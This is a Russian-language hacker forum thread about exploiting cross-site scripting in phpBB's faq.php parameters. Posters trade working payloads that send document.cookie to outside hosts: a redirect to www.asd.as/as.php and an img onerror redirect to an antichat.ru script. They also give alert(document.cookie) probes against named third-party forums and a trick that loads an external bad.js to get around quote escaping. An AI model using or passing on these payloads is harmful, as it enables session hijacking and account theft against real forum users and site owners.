Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;www.asd.as/as.php?xack=&quot;+document.cookie&lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&amp;#61&amp; #34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie&lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?

Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?

Вот так:
http://www.[target].ty/faq.php....1]=test (http://www.[target].ty/faq.php?faq[0][0]=te<script&gt;alert(document.cookie);&lt;/script&gt;st&faq[0][1]=test)

Вот так работает

http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&amp;faq[0][1]=test

а в каких версиях PHPbb это работает?
вот тут: www.rimspb.ru/forum/ например не пашет...

в разных...

http://forum.jamer.net/faq.php....]=Pengo (http://forum.jamer.net/faq.php?mode=bbcode&faq[0][0]=Pengo<script&gt;alert(document.cookie);&lt;/script&gt;%20Hacker&faq[0][1]=Pengo)

Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))

Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
А при чём тут он?????? :confused: :D

Мне его так не хватает... :( ... :D

Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>